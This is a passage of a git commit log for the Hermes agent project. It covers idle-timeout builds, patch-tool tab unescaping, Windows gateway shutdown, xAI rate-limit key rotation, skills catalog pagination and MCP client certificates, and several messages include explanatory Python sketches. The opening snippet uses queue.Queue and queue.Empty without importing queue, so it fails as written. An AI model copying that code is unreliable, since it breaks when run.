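import subprocess
import threading
from typing import Optional, Sequence


def run_with_idle_timeout(cmd: Sequence[str], idle_timeout: float) -> Optional[int]:
    """Stream cmd's output; kill it after idle_timeout seconds of silence.

    Returns the exit code, or None if the process was idle-killed.
    """
    proc = subprocess.Popen(
        cmd,
        stdout=subprocess.PIPE,
        stderr=subprocess.STDOUT,  # merge so one reader sees all activity
        text=True,
    )
    lines: "queue.Queue[Optional[str]]" = queue.Queue()

    def pump() -> None:
        # Reader thread: forward each output line, then an EOF sentinel.
        assert proc.stdout is not None
        for line in proc.stdout:
            lines.put(line)
        lines.put(None)

    threading.Thread(target=pump, daemon=True).start()

    while True:
        try:
            line = lines.get(timeout=idle_timeout)
        except queue.Empty:
            # No output for idle_timeout seconds: treat as stalled.
            proc.kill()
            proc.wait()
            return None
        if line is None:
            return proc.wait()
        print(line, end="", flush=True)
```

A caller in the spirit of this change would use something like `run_with_idle_timeout(["npm", "run", "build"], 180.0)` and fall back to the previous build when the result is None or nonzero.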

Tests:

- `tests/hermes_cli/test_run_with_idle_timeout.py` — 4 tests covering streaming success, nonzero exit, idle-kill, and missing-binary cases. Uses real `subprocess.Popen` on tiny Python scripts; isolated in its own file so per-file canonical-runner parallelism doesn't pair it with the mock-heavy tests.
- `tests/hermes_cli/test_web_ui_build.py` — updated existing tests to patch `_run_with_idle_timeout` for the build step in addition to `subprocess.run` for the install step.
- `tests/hermes_cli/test_cmd_update.py::test_update_refreshes_repo_and_tui_node_dependencies` — same update.

Full suite: `scripts/run_tests.sh tests/hermes_cli/` → 5646 passed, 0 failed.

Fixes #33788.
2026-05-28 03:34:47 -07:00
teknium1 78be458608 fix(patch): widen new_string \t/\r unescape to all match strategies (#33733)
Extends @liuhao1024's escape-normalized fix so the patch tool also
recovers when old_string carries a real tab byte and matches via the
`exact` strategy — which is the headline reproduction in the issue and
the most common case in practice (LLMs frequently get old_string right
because they re-read the file, but still serialize new_string's tabs as
two-character `\t`).

Instead of gating on the match strategy, decide per-sequence by looking
at the *matched region of the file*: only convert `\t` -> tab and
`\r` -> CR when the file region we're replacing actually contains the
corresponding control byte. That mirrors the region-based heuristic in
`_detect_escape_drift` and keeps legitimate writes of the literal
two-character string `"\t"` (e.g. patching `sep = "\t"` in Python
source) untouched — those files have a backslash+t in the matched
region, not a real tab, so new_string passes through verbatim. `\n` is
still excluded because newlines serialize correctly through JSON and
unescaping would corrupt source escape sequences far more often than
help.
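
The per-sequence decision can be sketched like this. `unescape_for_region`
is a hypothetical helper name, and the plain `str.replace` is a
simplification: it does not special-case an escaped backslash followed by
`t`, which the real code may handle differently.

```python
def unescape_for_region(new_string: str, matched_region: str) -> str:
    """Unescape literal tab/CR sequences only when the file region has them."""
    result = new_string
    # Convert backslash+t only if the replaced region holds a real tab.
    if "\t" in matched_region:
        result = result.replace("\\t", "\t")
    # Same rule for backslash+r and a real carriage return.
    if "\r" in matched_region:
        result = result.replace("\\r", "\r")
    # Backslash+n is deliberately left alone.
    return result
```

A region such as `sep = "\t"` in Python source contains a backslash and a
`t` but no tab byte, so new_string passes through unchanged.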

E2E verified against the live `patch` tool: tab-indented file + literal
`\t` in new_string under both `exact` (Variant 1) and `escape_normalized`
(Variant 2) strategies now produces real tab bytes; a Python source line
containing `sep = "\t"` (legitimate literal backslash-t) survives a
patch unchanged.

Tests updated to cover both strategies and the legitimate-literal case,
and to assert that `\n` is intentionally preserved.

Refs #33733
2026-05-28 03:27:20 -07:00
liuhao1024 e9f3f2b34a fix(tools): unescape common sequences in new_string when escape_normalized matches
When the patch tool matches via the escape_normalized strategy, old_string
contains literal \t, \n, \r sequences that get unescaped to match real
control characters in the file. However, new_string was written as-is,
leaving literal backslash sequences in the output.

Add _unescape_common_sequences() helper and apply it to new_string when
the matching strategy is escape_normalized. This ensures LLM-generated
tab/newline sequences become real bytes in the patched file.

Fixes #33733
2026-05-28 03:27:20 -07:00
Teknium 10ee4a729b fix(gateway): drain on Windows hermes gateway stop so sessions survive restart (#33798)
Sessions now survive `hermes gateway stop` / `restart` on native Windows.
Previously the gateway died on schtasks `/End` + os.kill SIGTERM without
ever running the drain loop, so the v0.13.0 session-resume feature (#21192)
silently broke on Windows: `resume_pending=True` was never written, and
the next boot started with a blank conversation history (issue #33778).

Root cause is twofold and the reporter only identified half of it:

1. `hermes_cli/gateway_windows.py::stop()` did not write the
   `planned_stop_marker` before signalling. The reporter caught this.

2. The bigger reason: `asyncio.add_signal_handler` raises
   NotImplementedError for SIGTERM/SIGINT on Windows, so even if the
   marker had been written, the gateway's existing SIGTERM handler
   (which is what calls `runner.stop()` and the `mark_resume_pending`
   loop) was never invoked. Writing the marker would have been
   necessary-but-insufficient.

The fix has two parts:

* gateway/run.py: new `_run_planned_stop_watcher` daemon thread polls
  for the planned-stop marker file every 0.5s. When the marker appears
  it calls `loop.call_soon_threadsafe(shutdown_signal_handler, None)`,
  the same shutdown path a real SIGTERM would have driven, including the
  pre-drain `mark_resume_pending` writes (run.py:5977) and graceful
  drain wait. The existing signal handler already accepts
  `received_signal=None` and falls through to
  `consume_planned_stop_marker_for_self()`, so no handler changes are
  needed. The watcher runs on every platform as cheap belt-and-suspenders.

* hermes_cli/gateway_windows.py: `stop()` now writes the marker for
  the running gateway PID and waits up to `agent.restart_drain_timeout`
  (default 30s) for the PID to exit cleanly. On clean drain, the kill
  sweep is non-forceful; on timeout, escalates to
  `kill_gateway_processes(force=True)` which routes to taskkill /T /F
  per `references/windows-native-support.md`.
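
A sketch of the marker-polling watcher, under assumptions: the function
name `start_planned_stop_watcher` and its parameters are illustrative, and
the already-draining and not-yet-running checks covered by the tests are
left out.

```python
import threading
from pathlib import Path
from typing import Callable


def start_planned_stop_watcher(
    marker: Path,
    on_stop: Callable[[], None],
    stop_event: threading.Event,
    poll_interval: float = 0.5,
) -> threading.Thread:
    """Poll for the marker file; call on_stop once when it appears."""

    def watch() -> None:
        # Event.wait doubles as an interruptible sleep between polls.
        while not stop_event.wait(poll_interval):
            if marker.exists():
                on_stop()
                return  # fire once, then exit the thread

    thread = threading.Thread(target=watch, daemon=True)
    thread.start()
    return thread
```

In the gateway, `on_stop` would be a small callable that hands off to the
event loop via `loop.call_soon_threadsafe(...)`, since the watcher runs on
its own thread.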

Validation:

* 7 new tests in tests/gateway/test_planned_stop_watcher.py covering:
  marker→handler dispatch, no-marker idle, already-draining skip,
  not-yet-running skip, stop_event responsiveness, fire-once
  semantics, error tolerance.
* 8 new tests in tests/hermes_cli/test_gateway_windows.py covering:
  marker-before-kill ordering, clean-drain skips force-kill,
  drain-timeout escalates to force=True, no-pid-skips-drain,
  invalid-pid handling, fast-exit success, timeout failure,
  marker-write-failure tolerance.
* E2E (Linux, detached orphan): write_planned_stop_marker(pid) +
  `_drain_gateway_pid(pid, 5.0)` returns True in 0.5s after the
  victim sees the marker and exits. Tested with a double-forked
  subprocess so the test parent isn't holding it as a zombie.
* Targeted: tests/gateway/{restart_drain,restart_resume_pending,
  signal,signal_format,status,shutdown_forensics,approve_deny_commands,
  planned_stop_watcher} + tests/hermes_cli/{gateway_windows,
  gateway_service} → 519/519.

What was wrong with the reporter's claim (for future archaeology): they
described the symptom as "no `resume_pending=True` written to
`sessions.json`" — but Hermes uses `state.db` (SQLite), not
`sessions.json`, and `mark_resume_pending` is called regardless of
the marker (the marker only affects exit code 0 vs 1 for systemd
revival semantics). The real session-loss path is the missing drain
on Windows, not a missing marker. Both halves are fixed here.

Closes #33778.
2026-05-28 03:25:32 -07:00
teknium1 f8896dedc8 chore(release): map biser@bisko.be -> bisko in AUTHOR_MAP 2026-05-28 03:21:00 -07:00
Biser Perchinkov b5495db701 fix(agent): re-pad reasoning_content on cross-provider fallback to require-side providers
api_messages is built once before the retry loop while the primary provider
is active. When a mid-conversation fallback switches to a require-side thinking
provider (DeepSeek/Kimi/MiMo), assistant turns built under a non-require primary
(e.g. Codex) go out without reasoning_content and the new provider rejects the
request with HTTP 400 ("reasoning_content must be passed back").

Re-apply the echo-back pad against the current provider immediately before
building the request kwargs. Idempotent and a no-op unless the active provider
enforces echo-back, so it covers all fallback paths without affecting normal or
reject-side operation.
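
A sketch of an idempotent echo-back pad. The helper name, the boolean
`provider_requires_echo` flag, and the empty-string pad value are all
assumptions for illustration; the actual pad content and provider
detection are not described in this message.

```python
from typing import Any


def pad_reasoning_content(
    messages: list[dict[str, Any]], provider_requires_echo: bool
) -> list[dict[str, Any]]:
    """Ensure assistant turns carry reasoning_content when required."""
    if not provider_requires_echo:
        return messages  # no-op for providers that do not enforce echo-back
    padded = []
    for msg in messages:
        if msg.get("role") == "assistant" and "reasoning_content" not in msg:
            # Assumed pad value; copy rather than mutate the caller's dict.
            msg = {**msg, "reasoning_content": ""}
        padded.append(msg)
    return padded
```

Running the pad a second time changes nothing, which is what makes it safe
to re-apply immediately before every request build.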

Drafted by Claude (Opus 4.7) under human review while fixing a personal deployment.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
2026-05-28 03:21:00 -07:00
Indigo Karasu 9179396cb7 fix(stream-consumer): only set _final_content_delivered when final response confirmed delivered
In GatewayStreamConsumer._run(), _final_content_delivered was set to True
based on the success of a mid-stream finalize edit, before the final
finalize edit was attempted. When the final edit later failed (Telegram
flood control, retry-after), _final_response_sent stayed False but
_final_content_delivered was already True, so gateway/run.py suppressed
its normal final send and the user saw a partial / fallback message
instead of the real answer.

Changes in gateway/stream_consumer.py:
- Remove the premature _final_content_delivered = True at the top of
  the got_done block.
- Set _final_content_delivered = True only when the actual final send /
  edit succeeds, in each finalize branch (no-finalize adapter,
  _message_id finalize, no-_already_sent send).
- _send_fallback_final: don't set _final_response_sent = True when only
  some chunks were delivered; the gateway should still attempt a
  complete final send. Set _final_content_delivered = True alongside
  _final_response_sent on the success path and short-text path.
- Cancellation handler: set _final_content_delivered = True alongside
  _final_response_sent when the best-effort final edit succeeds.

Adds TestFinalContentDeliveredGuard with 3 regression tests covering
the core bug scenario, the happy path, and partial fallback.

Closes #33708
Closes #25010
Refs #29200

Co-authored-by: Teknium <127238744+teknium1@users.noreply.github.com>
2026-05-28 03:15:19 -07:00
Dusk1e a91b1c8b31 fix(tirith): reject non-regular tar members during auto-install process 2026-05-28 02:49:26 -07:00
teknium1 247b24b49f chore(release): add AUTHOR_MAP entry for AdityaRajeshGadgil 2026-05-28 02:45:25 -07:00
Aditya Rajesh Gadgil 031983bbf8 fix: limit pre-update state snapshots 2026-05-28 02:45:25 -07:00
Teknium 8b6beaab5f docs: 30-day overhaul — correctness audit, PR coverage, Nous Portal weave, sidebar reorg (#33782)
* docs(audit): correctness pass across getting-started, reference, features, messaging, developer-guide, guides, integrations, user-guide

* docs: add PR coverage for last 30d + Nous Portal weave + nav reorg + build fixes

- Add docs for top user-visible PRs that shipped without docs (api-server
  session control, kanban features, telegram pin/edit, provider client tag,
  xAI retired-model migration, cron name lookup, --branch update flag, etc.)
- Apply Nous Portal weave across 23 pages (tasteful one-liners on
  getting-started/learning-path, configuration, overview, vision, x-search,
  credential-pools, provider-routing, cron, codex-runtime, profiles, docker,
  messaging/index, multiple guides, plus FAQ + index promotion)
- Reorganize sidebar: split Messaging into Popular/M365/Chinese/Other,
  Reference into Command/Configuration/Tools-Skills sub-categories, add
  orphan developer-guide pages (web-search-provider-plugin,
  browser-supervisor), move features from Integrations back to Features,
  fold lone spotify into Media & Web.
- Regenerate skill stubs + catalogs (kanban-codex-lane, hermes-s6-container-
  supervision, web-pentest)
- Fix broken anchor links (security/cron, configuration/fallback, telegram
  large-files, adding-platform-adapters step-by-step)
2026-05-28 02:41:36 -07:00
teknium1 c7f7783e5c test(xai-proxy): regression coverage for #28932 429 handling
Three new tests in tests/hermes_cli/test_proxy.py:

- xai_adapter_retry_rotates_pool_entry_on_429 — headline #28932 case.
  Two-entry pool, 429 on first entry, must rotate to second entry
  AND must NOT call refresh_xai_oauth_pure (refresh is irrelevant
  for rate limits).
- xai_adapter_retry_returns_none_on_429_when_pool_exhausted —
  single-entry pool: 429 returns None so the rate-limit response
  flows back to the client unchanged (existing behavior preserved).
- xai_adapter_retry_returns_none_for_unrelated_status — non-{401,
  429} statuses must not trigger any retry path at all; guards
  against the gate becoming too broad in future changes.

Each test asserts that refresh_xai_oauth_pure is never called on the
429 path — refresh is a 401-specific concern.

39/39 in tests/hermes_cli/test_proxy.py.
2026-05-28 02:36:37 -07:00
sprmn24 4ed482549f fix(xai-proxy): handle 429 rate-limit responses in proxy retry path
get_retry_credential only triggered on 401; a 429 Too Many Requests from
xAI was silently streamed back with no key rotation or back-off signal.

- server.py: widen retry gate from == 401 to in {401, 429}
- xai.py: on 429, skip token refresh and call mark_exhausted_and_rotate
  to stamp the 1-hour cooldown on the rate-limited key and return the
  next available credential. Returns None if pool is exhausted.
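
The widened gate, sketched with hypothetical callables. `refresh` and
`rotate` stand in for the token-refresh and mark_exhausted_and_rotate
steps; the real get_retry_credential takes different arguments, and its
401 path may do more than a plain refresh.

```python
from typing import Callable, Optional

RETRYABLE_STATUSES = {401, 429}


def get_retry_credential(
    status: int,
    refresh: Callable[[], Optional[str]],
    rotate: Callable[[], Optional[str]],
) -> Optional[str]:
    """Return a credential to retry with, or None to pass the response on."""
    if status not in RETRYABLE_STATUSES:
        return None
    if status == 429:
        # Rate limit: a token refresh would not help, so rotate instead.
        # rotate() returns None when the pool is exhausted.
        return rotate()
    return refresh()
```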
2026-05-28 02:36:37 -07:00
Dusk1e aa3466063b fix(android): reject unsafe tar members in psutil compatibility installer 2026-05-28 02:36:09 -07:00
Teknium bb0ac5ced2 chore(release): AUTHOR_MAP entry for vynxevainglory-ai
PR #29233 salvage.
2026-05-28 02:33:51 -07:00
Teknium 70abae8e3b fix(kanban): show horizontal scrollbar instead of wrapping columns
Salvage follow-up on top of @vynxevainglory-ai's PR #29233. Keep the
column-body flex:1 + min-height:0 fix (tall columns scroll internally
now), but drop the flex-wrap: wrap part — instead just stop hiding
the existing horizontal scrollbar.

PR #523254b34 (sadiksaifi, May 18) deliberately moved the kanban board
from a wrapping grid to a single-row pinned-width flex so the board
stays as one stable horizontal row. The mistake in that PR was the
scrollbar-width: none + ::-webkit-scrollbar { display: none } pair,
which hid the affordance so columns past the viewport became visually
inaccessible. Fixing that hidden-scrollbar bug while keeping the
single-row design honors both contributors' intent.
2026-05-28 02:33:51 -07:00
Vynxe Vainglory 538f0fa339 fix(kanban): wrap columns into rows and fix vertical overflow
Two CSS issues in the kanban dashboard:

1. Columns overflow horizontally with no way to reach them — the
   original scrollbar-width: none hid the scrollbar entirely, and
   even with a scrollbar, a wrapping layout is better UX for a board
   with 8+ columns. Changed to flex-wrap: wrap and removed the
   overflow-x: auto + hidden scrollbar rules. Columns now flow into
   multiple rows (~3 per row on a typical viewport) instead of
   running off-screen.

2. .hermes-kanban-column-body lacked flex: 1 and min-height: 0,
   so the flex child's implicit min-height: auto prevented it from
   shrinking below its content size. Columns with many cards pushed
   past the parent max-height instead of scrolling internally.

Verified: 9 columns wrap into 3 rows, all visible without
horizontal scroll. Done column (53 tasks) scrolls vertically
within its column bounds.
2026-05-28 02:33:51 -07:00
teknium1 9b5dae17a5 feat(context-engine): host contract for external context engines
Condenses the substance of PRs #16453, #17453, #16451, #17600, and #13373
into a minimal generic host contract that external context engine plugins
(e.g. hermes-lcm) need to integrate cleanly. Drops scaffolding that
duplicated existing infrastructure or had marginal value.

Five concrete changes:

1. `_transition_context_engine_session()` on AIAgent — generic lifecycle
   helper that fires on_session_end → on_session_reset → on_session_start
   → optional carry_over_new_session_context. Engines implement only the
   hooks they need; missing hooks are skipped. Built-in compressor keeps
   its existing reset-only behavior because callers default to no
   metadata. `reset_session_state()` now optionally accepts
   previous_messages / old_session_id / carry_over_context and delegates
   to the transition helper when provided. (#16453)

2. `conversation_id` passed to `on_session_start()` — both the
   agent-init call site and the compression-boundary call site now
   forward `self._gateway_session_key` so plugin engines have a stable
   conversation identity that survives session_id rotation (compression
   splits, /new, resume). The key already existed on AIAgent; it just
   wasn't reaching engines. (#16453)

3. Canonical cache buckets forwarded to engines — the usage dict passed
   to `update_from_response()` now includes input_tokens, output_tokens,
   cache_read_tokens, cache_write_tokens, and reasoning_tokens on top of
   the legacy prompt/completion/total keys. Engines can make decisions on
   cache-hit ratios and reasoning costs instead of only aggregates. ABC
   docstring updated. (#17453)

4. Plugin-registered context engines visible in the picker —
   `_discover_context_engines()` in plugins_cmd.py now also includes
   engines registered via `ctx.register_context_engine()` from plugin
   manifests, deduplicating by name so repo-shipped descriptions win on
   collision. (#16451)

5. `_EngineCollector.register_command()` — context engines using the
   standard `register(ctx)` pattern can now expose slash commands (e.g.
   `/lcm`). Routes to the global plugin command registry with the same
   conflict-rejection policy regular plugins use (no shadowing built-ins,
   no clobbering other plugins). Previously these calls hit a no-op and
   the slash commands silently never appeared. (#17600)
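
The lifecycle ordering in change 1, with missing hooks skipped, can be sketched like this. It is an illustration only: the function name `transition_session`, the keyword arguments passed to each hook, and the returned list of fired hooks are all assumptions; the hook names and their order are taken from the list above.

```python
def _call_if_present(engine, hook, **kwargs):
    """Invoke engine.<hook>(**kwargs) if the engine implements it."""
    fn = getattr(engine, hook, None)
    if callable(fn):
        fn(**kwargs)
        return True
    return False


def transition_session(engine, *, old_session_id, new_session_id,
                       conversation_id, previous_messages=None,
                       carry_over_context=None):
    # Hook argument names below are hypothetical; only the order is from the text.
    steps = [
        ("on_session_end", {"session_id": old_session_id,
                            "messages": previous_messages or []}),
        ("on_session_reset", {}),
        ("on_session_start", {"session_id": new_session_id,
                              "conversation_id": conversation_id}),
    ]
    if carry_over_context is not None:
        steps.append(("carry_over_new_session_context",
                      {"context": carry_over_context}))
    fired = []
    for hook, kwargs in steps:
        if _call_if_present(engine, hook, **kwargs):
            fired.append(hook)
    return fired
```

An engine that defines only `on_session_start` would see exactly one call, carrying the stable `conversation_id` alongside the rotated session id.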

Dropped from the original 5 PRs:

- Compression boundary signal (`boundary_reason="compression"`) from
  #16453 — already on main at `agent/conversation_compression.py:412-424`,
  landed via the bg-review extraction.

- `discover_plugins()` before fallback in run_agent.py from #16451 —
  redundant: `get_plugin_context_engine()` already routes through
  `_ensure_plugins_discovered()` which is idempotent.

- Runtime identity diagnostics method + helpers from #13373 (+251 LOC) —
  operators can already read engine state via `engine.get_status()`;
  the diagnostics view added marginal value relative to its surface area.

- The 553-LOC slash-command machinery from #17600 — replaced with a
  20-LOC `register_command` method on the collector that reuses the
  existing plugin command registry instead of building a parallel one.

Net: ~215 LOC of host-contract changes + 282 LOC of focused tests, vs
~1,176 LOC across the original 5 PRs.

Co-authored-by: Tosko4 <1294707+Tosko4@users.noreply.github.com>

Closes #16453.
Closes #17453.
Closes #16451.
Closes #17600.
Closes #13373.
Related: stephenschoettler/hermes-lcm#68.
2026-05-28 01:45:30 -07:00
Teknium fb9f3a4ef9 fix(skills): pull full ClawHub catalog into the skills index (200 → 20k+) (#33748)
* fix(skills): pull full ClawHub catalog into the skills index

The website was showing 200 ClawHub skills out of 20k+ because
`ClawHubSource.search("")` for empty queries went straight to a single
unpaginated request. ClawHub's API caps any single page at 200 items and
returns a `nextCursor`; we grabbed page 1 and stopped, so the cached
index served from hermes-agent.nousresearch.com had a silent 99%
truncation.

End users never hit clawhub.ai directly (the index is rebuilt twice
daily by .github/workflows/skills-index.yml and served as a static JSON
on the docs site), so the cap-and-cache architecture is correct — it
just wasn't being filled.

Changes:
- `ClawHubSource.search(query="")` now routes through the existing
  `_load_catalog_index()` paginating walker instead of the unpaginated
  listing fallback (non-empty queries still hit the fast catalog search).
- `_load_catalog_index()` max_pages 50 → 250 (50k-skill ceiling; live
  catalog is ~20k as of May 2026, with headroom for growth).
- `build_skills_index.py`: per-source crawl limits split out — ClawHub
  and LobeHub get 100k, others keep their effective caps.
- `EXPECTED_FLOORS["clawhub"]` 50 → 5000 so the next pagination
  regression hard-fails the CI build instead of silently shipping a
  degenerate index.
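
A cursor-following walk of the kind described here might look like the sketch below. The `fetch_page` callable and the `items` key are assumptions for illustration; `nextCursor`, the 200-item page cap, and the `max_pages` ceiling are from the description above. This is not the body of `_load_catalog_index()`.

```python
def walk_catalog(fetch_page, max_pages=250):
    """Follow nextCursor until the API stops returning one or the ceiling is hit.

    fetch_page(cursor) is a hypothetical callable that returns one decoded
    page, e.g. {"items": [...], "nextCursor": "abc"}.
    """
    items = []
    cursor = None
    for _ in range(max_pages):
        page = fetch_page(cursor)
        items.extend(page.get("items", []))
        cursor = page.get("nextCursor")
        if not cursor:
            break  # last page reached
    return items
```

The original bug corresponds to calling `fetch_page(None)` once and returning, which silently yields only the first 200 items.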

Test plan:
- New unit test `test_search_empty_query_paginates_full_catalog`
  exercises the cursor-following path with three mocked pages (450
  total items) and asserts all pages are walked.
- Existing 9 ClawHub tests + 127 broader skills_hub tests all pass.
- E2E against live ClawHub API: walker reached 9700+ skills across 49
  pages before this commit landed, paginating well past the previous
  50-page cap.

* fix(skills): raise ClawHub ceilings — live catalog is 50k, not 20k

An E2E walk against the live ClawHub API hit the initial 250-page cap at
49,698 skills with a `nextCursor` still pending. The catalog is roughly
2.5x larger than the docstring estimate.

- max_pages 250 → 750 (150k ceiling, walks terminate on cursor=None
  well before this in practice)
- SOURCE_LIMITS['clawhub'] 100k → 200k
- EXPECTED_FLOORS['clawhub'] 5000 → 20000
2026-05-28 01:42:19 -07:00
Teknium 09a5cd8084 fix(auth): sync manual:device_code Codex pool entries on re-auth (#33744)
#33164 made _save_codex_tokens sync the singleton-seeded `device_code`
pool entry on Codex OAuth re-auth. That fixed the #33000 path but missed
`manual:device_code` entries created by `hermes auth add openai-codex`
(the recommended workaround for users who hit #33000 before #33164
landed).

Every subsequent re-auth would refresh the device_code entry but leave
the manual:device_code entry holding the consumed refresh token plus
stale last_error_* markers — immediately recreating the 401
token_invalidated symptom on the next request, exactly as reported in
#33538.

Extend the refreshable source set to include `manual:device_code`.
Completing the device-code OAuth flow proves the user owns the ChatGPT
account, so it is safe to refresh every device-code-backed entry. Keep
`manual:api_key` and other non-device-code manual sources untouched —
those represent independent credentials.
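
In outline, the extended sync could look like the following sketch. The entry dictionaries, the `access_token` / `refresh_token` field names, and the function name `sync_codex_pool` are assumptions for illustration; the two refreshable source names and the `last_error_*` markers come from the description above.

```python
REFRESHABLE_SOURCES = {"device_code", "manual:device_code"}


def sync_codex_pool(entries, access_token, refresh_token):
    """Return a copy of the pool with device-code-backed entries refreshed.

    Entries from other sources (e.g. manual:api_key) are passed through as-is.
    """
    updated = []
    for entry in entries:
        if entry.get("source") not in REFRESHABLE_SOURCES:
            updated.append(entry)
            continue
        # Drop stale error markers so the entry is not treated as failed.
        fresh = {k: v for k, v in entry.items()
                 if not k.startswith("last_error_")}
        fresh["access_token"] = access_token
        fresh["refresh_token"] = refresh_token
        updated.append(fresh)
    return updated
```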

Closes #33538.
2026-05-28 01:33:10 -07:00
Dusk1e 43abc51f66 fix(security): require source CIDR allowlisting for public msgraph webhook binds 2026-05-28 01:26:18 -07:00
Teknium 986abb3cf7 docs: drop stale Kimi/DeepSeek vision example (#33736)
Kimi K2.6 is natively multimodal — flagged by Shengyuan from the Kimi
growth team. Replace the named-vendor example with a model-agnostic
phrasing so the row doesn't go stale as more vendors ship vision.
2026-05-28 01:23:38 -07:00
Teknium 87e5b2fae0 feat(mcp): support TLS client certificates (mTLS) for HTTP and SSE servers (#33721)
Adds first-class `client_cert` / `client_key` config keys so MCP servers
behind mTLS work without an external TLS-terminating proxy. Resolves
an inbound community question (Jeremy W.).

Schema (per `mcp_servers.<name>`, HTTP/SSE only):

- `client_cert: "/path/to/combined.pem"` — single PEM with cert + key
- `client_cert: "/path/to/cert"` + `client_key: "/path/to/key"` — separate
- `client_cert: [cert, key]` or `[cert, key, password]` — list form,
  with optional passphrase for encrypted keys

Paths support `~` expansion. Missing files raise a server-scoped
`FileNotFoundError` at connect time rather than failing later with an
opaque TLS handshake error.
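
The three input forms can be normalized along these lines. This is a sketch under assumptions, not the `_resolve_client_cert` helper itself: the function signature, the error wording, and the choice to return a plain string or tuple (the shapes `httpx` accepts for `cert=`) are illustrative.

```python
import os


def resolve_client_cert(server_name, client_cert, client_key=None):
    """Normalize client_cert/client_key config into a str or tuple, or None."""
    if client_cert is None:
        return None
    if isinstance(client_cert, (list, tuple)):
        if len(client_cert) not in (2, 3):
            raise ValueError(
                f"MCP server '{server_name}': client_cert list must be "
                "[cert, key] or [cert, key, password]"
            )
        cert, key, *rest = client_cert
        password = rest[0] if rest else None
    else:
        cert, key, password = client_cert, client_key, None

    def _expand(path):
        expanded = os.path.expanduser(str(path))
        if not os.path.isfile(expanded):
            # Fail early with the server name instead of a late TLS error.
            raise FileNotFoundError(
                f"MCP server '{server_name}': file not found: {expanded}"
            )
        return expanded

    cert_path = _expand(cert)
    if key is None:
        return cert_path                      # single combined PEM
    key_path = _expand(key)
    if password is None:
        return (cert_path, key_path)
    return (cert_path, key_path, password)    # encrypted key with passphrase
```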

Wiring:

- New SDK HTTP path (mcp >= 1.24): `cert=` on the user-owned
  `httpx.AsyncClient` alongside the existing `verify=` handling.
- SSE path: routed through an `httpx_client_factory` that wraps the
  SDK's defaults (follow_redirects=True) and layers `verify` + `cert`
  on top. The factory is only injected when needed, so the SDK's
  built-in `create_mcp_http_client` keeps being used in the default
  case.
- Deprecated mcp<1.24 path left untouched — that SDK's
  `streamablehttp_client` signature doesn't expose `cert`, and adding
  it would be dead code.

Also documents the previously-undocumented `ssl_verify` key (bool or
CA bundle path) in the MCP config reference.

Tests:

- `tests/tools/test_mcp_client_cert.py` (new, 19 tests):
  - `_resolve_client_cert` helper: all three input forms, `~` expansion,
    missing-file and validation errors.
  - HTTP transport: `cert=` forwarded into `httpx.AsyncClient` for
    string and tuple forms; absent when unset; missing-file error
    propagates.
  - SSE transport: factory only injected when cert or non-default
    verify is set; factory applies cert, custom CA bundle, and
    preserves `follow_redirects=True` + forwarded headers/auth.
- Existing tests: 200/200 in `test_mcp_tool.py` + `test_mcp_sse_transport.py`
  still pass.
2026-05-28 00:55:55 -07:00
Stephen Schoettler 8595281f3c fix: expose context engine tools with saved toolsets 2026-05-28 00:28:42 -07:00
Dusk1e 1a9ef83147 fix(security): require API_SERVER_KEY before dispatching API server work 2026-05-28 00:25:08 -07:00
LeonSGP43 442a9203c0 Fix xAI OAuth timeout manual fallback 2026-05-28 00:24:17 -07:00
helix4u 459d7694d3 fix(agent): preload jiter native parser 2026-05-28 00:20:11 -07:00
Robin Fernandes dc52b82d53 test(auth): update entitlement CI expectations 2026-05-28 00:19:31 -07:00
Robin Fernandes 1cf5e639b3 fix(auth): refresh Nous entitlement in tool menus 2026-05-28 00:19:31 -07:00
Robin Fernandes 406901b27d feat(auth): normalise how we check whether a user has free or paid access to Nous Portal, so behaviour and error messages can be exposed accordingly 2026-05-28 00:19:31 -07:00
stephenschoettler 0bf9b867cf fix(website): pin serialize-javascript and uuid via npm overrides
Resolves the two Dependabot alerts currently open against the website
lockfile:

- serialize-javascript: pin to ^7.0.5 (was 6.0.2, which has a
  high-severity RCE via RegExp.flags + Date.prototype.to*, plus a
  medium-severity DoS)
- uuid: pin to ^14.0.0 (was 8.3.2, which has a medium-severity missing
  buffer bounds check in v3/v5/v6 when buf is provided)

Lockfile regenerated against current main (not the stale lockfile
from the original PR — several Dependabot bumps for mermaid,
webpack-dev-server, @babel/plugin-transform-modules-systemjs,
fast-uri, lodash-es+langium, lodash, follow-redirects, and dompurify
have landed since #30036 was opened, so the website portion was
re-applied surgically on top of those).

Salvaged the website half of PR #30036. The TUI test half landed
on main separately, so this PR is web-only.
2026-05-28 00:07:54 -07:00
kshitijk4poor 7b778db472 chore(release): map MoonRay305 contributor email for #32759 salvage
Adds `squiddy@2rook.ai → MoonRay305` to AUTHOR_MAP so contributor_audit.py
passes for the salvaged commits in #33482-followup PR.
2026-05-27 23:28:51 -07:00
Squiddy 3ba8962738 fix(kanban): add Windows init lock guard 2026-05-27 23:28:51 -07:00
Squiddy 90b6b3d18f fix(kanban): harden sqlite connection concurrency 2026-05-27 23:28:51 -07:00
Brian D. Evans 3ad46933d3 docs(voice): use uv pip install faster-whisper in STT install hints (#29800)
* docs(voice): use `uv pip install faster-whisper` in STT install hints

Three runtime messages told users to `pip install faster-whisper`
(reported in #29782 for the gateway STT failure message under
Telegram-in-Docker, where the user hit `bash: pip: command not
found`). The Hermes Docker image is built on `ghcr.io/astral-sh/uv`
with a uv-managed venv that doesn't ship `pip` on PATH; users on
modern `uv tool install` / `uv venv` installs see the same problem.

The canonical install command in this repo is `uv pip install`
(see `tools/lazy_deps.py:509` `feature_install_command()`), which
works in Docker (uv image), in `uv tool install` venvs, and in
pip-based venvs that already have uv on PATH.

Changed three locations to match:

- `gateway/run.py` — Telegram/Discord/Slack/WhatsApp/etc. voice
  reply when no STT provider is configured. Suggests
  `uv pip install faster-whisper` and notes that
  `pip install faster-whisper` also works if `pip` is on PATH.
- `tools/voice_mode.py` — `/voice` status line for missing STT.
- `cli.py` — Voice-mode startup error, "Option 1".

No behavior change beyond the user-facing text. No production
code path was touched.

* docs(voice): add pip fallback to cli + voice_mode STT hints

Copilot flagged that cli.py and tools/voice_mode.py recommend
`uv pip install faster-whisper` without a fallback for environments
where uv isn't on PATH. The gateway/run.py message already lists
`pip install faster-whisper` as an alternative; this commit aligns
the two remaining call sites to match.

Addresses inline Copilot review on #29800.

---------

Co-authored-by: briandevans <252620095+briandevans@users.noreply.github.com>
2026-05-28 16:23:14 +10:00
Teknium 4e702fe2d9 test(ci): harden two flaky tests against CI noise (#33675)
Two unrelated transient failures on PR #33661's initial CI run, both
pre-existing on main and recovered on rerun. Hardening:

1. tests/cron/test_scheduler.py::TestRunJobConfigLogging — added mocks for
